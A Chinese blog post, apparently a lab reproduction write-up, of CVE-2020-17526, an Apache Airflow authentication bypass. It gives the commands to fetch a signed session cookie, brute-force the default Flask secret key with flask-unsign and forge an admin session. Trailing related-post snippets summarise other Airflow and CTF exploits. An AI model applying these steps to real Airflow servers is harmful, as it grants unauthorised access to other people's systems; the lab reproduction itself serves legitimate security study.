Apache Airflow 默认密钥导致的权限绕过(CVE-2020-17526)

最新推荐文章于 2024-11-01 16:50:37 发布
最新推荐文章于 2024-11-01 16:50:37 发布
阅读量459 收藏 6
点赞数 9
文章标签: apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45910629/article/details/135373069
版权
本文介绍了ApacheAirflow1.10.13版本之前的一个安全漏洞,攻击者可通过默认密钥绕过登录,使用flask-unsign工具爆破SECRET_KEY并伪造用户。
摘要由CSDN通过智能技术生成

漏洞介绍

Apache Airflow是一款开源的,分布式任务调度框架。默认情况下,Apache Airflow无需用户认证,但管理员也可以通过指定webserver.authenticate=True来开启认证。
在其1.10.13版本及以前,即使开启了认证,攻击者也可以通过一个默认密钥来绕过登录,伪造任意用户。

漏洞环境

执行如下命令启动一个Apache Airflow 1.10.10服务器:

#Initialize the database
docker compose run airflow-init

#Start service
docker compose up -d

启动环境后,访问http://ip:8080即可登录web页面
image.png

漏洞复现

1、访问登录页面,服务器返回一个签名后的cookie

curl -v http://ip:8080/admin/airflow/login

image.png
2、使用flask-unsign这个工具来爆破签名时使用的SECRET_KEY:

#flask-unsign下载地址
https://github.com/Paradoxis/Flask-Unsign

#下载方法
1、安装应用程序
pip3 install flask-unsign[wordlist]
2、安装核心代码,省略[wordlist]
pip3 install flask-unsign
3、要安装该工具用于开发目的,请运行以下命令(下载副本后):
pip3 install -e .[test]
4、使用工具介绍 flask-unsign 安装成功

#mac安装遇到的问题,
zsh: no matches found: flask-unsign[wordlist]
打开.zshrc open -e .zshrc
写入 setopt no_nomatch
终端输入 source .zshrc

flask-unsign -u -c [session from Cookie]

image.png
成功爆破出Key是temporary_key。使用这个key生成一个新的session,其中伪造user_id为1:

flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"

image.png
在浏览器使用新生成的cookie,可成功登陆了
image.png

Tmac自留
关注
[ vulhub漏洞复现篇 ] Apache Airflow Celery 消息中间件命令执行漏洞复现 CVE-2020-11981
qq_51577576的博客
12-18 675
[ vulhub漏洞复现篇 ] Apache Airflow Celery 消息中间件命令执行漏洞复现 CVE-2020-11981 Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery的消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令。
简单的Apache AirflowCVE-2022-40127)漏洞复现
kali_Ma的博客
12-09 1620
Apache Airflow 是一个可编程,调度和监控的工作流平台,基于有向无环图(DAG),Airflow 可以定义一组有依赖的任务,按照依赖依次执行。官方已发布版本 2.4.3,可升级Apache Airflow版本到2.4.0或以上,或者停用默认 Dags。当攻击者可访问到Apache Airflow的后台,且环境中存在默认
【严重】Apache Airflow Run Task 权限绕过漏洞
murphysec的博客
08-07 383
Airflow 受影响版本中,Run Task 功能允许用户手动触发执行特定的任务,而不受正常的任务调度和依赖关系限制。当用户没有执行某个特定任务的权限时,可以通过 Run Task 功能手动触发该任务的执行,从而绕过本应该实施的访问控制和依赖关系。OSCS 是国内首个开源软件供应链安全社区,社区联合开发者帮助全球顶级开源项目解决安全问题,并提供实时的安全漏洞情报,同时提供专业的代码安全检测工具为开发者费使用。Airflow 是一个开源的工作流自动化平台,它允许用户定义、调度和监视工作流任务的执行。
Apache Airflow 默认密钥导致权限绕过(CVE-2020-17526)
Rin_CSDN
10-17 514
利用CVE-2020-11978存在的漏洞即可。
Airflow 实战:安装配置和代码示例
AI天才研究院
09-19 3317
数据中心是技术部的一个独立团队,承担了包括数据开发、数据平台建设、数据仓库建设、数据应用支撑等工作。作为一个运营商级的数据平台服务公司,通过构建面向分析师和数据科学家的大数据分析工具平台、完善的产品体系和数据治理机制,结合数据的价值驱动,提升业务决策效率,助力美团和相关机构取得更高的收益。随着公司业务的不断扩张、用户的增长、新型互联网场景的出现,需要大量的数据处理、分析、存储,同时还要保证数据的准确性、完整性和可靠性。因此,本文将对美团点评数据中心的数据仓库系统——Airflow进行全面的分析和介绍。
python 中的 flask_unsign 模块如何使用?
Java_Dad的博客
02-13 1362
python 中的 flask_unsign 模块的使用方法,cookie爆破
LitCTF-2023-web部分
m0_74097148的博客
05-18 1994
也有多种解法,当然如果上传有黑名单限制 但是远程下载没有 则可以用远程下载去下载PHP木马文件,然后剩余的步骤和上传木马的操作一样 不多做说明。并且题目提示我们只有username, password两列, 不需要group by去判断列数了。输入如下图的内容, 下载后点击编辑文件即可看到flag。如果想要了解更多关于http头部的信息可以参考。
Apache Airflow 错误的会话验证漏洞 (CVE-2020-17526)利用
weixin_40418457的博客
06-22 1081
0x01 漏洞描述 Apache 官方在2020年12月21日发布的邮件中披露Apache Airflow 存在一个由于错误处理会话验证导致的未授权访问漏洞。如果用户使用了默认的秘钥配置,攻击者就可以在其他的一个配置了默认秘钥的站点进行登录,接着以登录后的session信息直接未授权访问受害者站点。 引用:https://mp.weixin.qq.com/s/EN4bsZl1ylpAtpIlISK3nQ 0x02 漏洞利用 FOFA指纹: title=="Airflow - Login&q
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本
12-09
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来...
Apache Airflow Celery 消息中间件命令执行漏洞复现(CVE-2020-11981)
Tauil的博客
08-14 1817
利用Airflow的CeleryExecutor类来进行命令执行,可利用版本小于1.10.10。到airflow的celery redis队列。写入一个JSON任务消息执行。然后另起一个终端,输入。,回到原终端执行命令。,即可连接到目标靶机。...
CVE-2020-11978 Apache Airflow 命令注入漏洞分析与利用
CuiXY's Blog
09-29 1183
漏洞软件:Apache Airflow影响版本:
HGAME week2 web
qq_34942239的博客
02-22 364
测试发现可以反引号命令执行。
AirFlow 安装配置
古强俊的博客
12-27 1141
文章目录airflow 安装配置airflow 相关软件安装python 3.6.5 安装pip3 安装MySQL 5.7.28 安装redis 安装RabbitMQ 安装airflow 单节点部署架构图步骤airflow 多节点(集群)部署架构图多节点好处扩展 worker 节点水平扩展垂直扩展扩展 Master 节点(高可用)队列服务及元数据库(Metestore)的高可用。airflow 集...
[CTF]2022美团CTF WEB WP
Sapphire037的博客
09-18 3711
2022美团CTF的WEB方向Write up
Apache Airflow 身份验证绕过 (CVE-2020-17526)
m0_49025459的博客
11-01 468
Apache Airflow是一款开源的,分布式任务调度框架。默认情况下,Apache Airflow无需用户认证,但管理员也可以通过指定来开启认证。在其1.10.13版本及以前,即使开启了认证,攻击者也可以通过一个默认密钥绕过登录,伪造任意用户。
漏洞复现----49、Apache Airflow 身份验证绕过 (CVE-2020-17526)
七天
07-06 2942
Apache Airflow 身份验证绕过 (CVE-2020-17526)
airflow详细配置说明
permike的专栏
08-11 8052
[core] # The home folder for airflow, default is ~/airflow airflow_home = /home/frappe/airflow # The folder where your airflow pipelines live, most likely a # subfolder in a code repository dags_fold
HexionCTF web&crypto&misc题目分析
蚁景网安学院
05-14 1404
HexionCTF 2020 都是一些基础和中等的题目,但是没有 ak,等到官方 wp (https://github.com/HexionTeam/HexionCTF-Writeups...
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
最新发布
2301_80951345的博客
11-01 361
总结:在apache在2.4.0~2.4.29的环境下上传1.php,在hex中在php后面插入字符“0a”,即可绕过Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。这里可以在hex中在php后面插入“0a”。在1.php后面插入一个\x0A(注意,不能是。版本中存在一个解析漏洞,在解析PHP时,访问刚才上传的1.php%0a,可以解析。上传一个1.php,被拦截。
CVE-2020-11978
08-10
回答:CVE-2020-11978是Apache Airflow中的一个命令注入漏洞。根据引用中提到的博文,漏洞可以通过复现来进行验证。要进行复现,可以使用vulhub靶场中的CVE-2020-11978文件夹,并按照指示输入相关命令启动docker-compose来搭建环境。需要注意的是,由于技术文章具有时效性,建议查看文章出处以获取最新版本的信息。123 #### 引用[.reference_title] - *1* *2* *3* [(CVE-2020-11978)Airflow dag中的命令注入漏洞复现【vulhub靶场】](https://blog.csdn.net/weixin_43847838/article/details/125349343)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值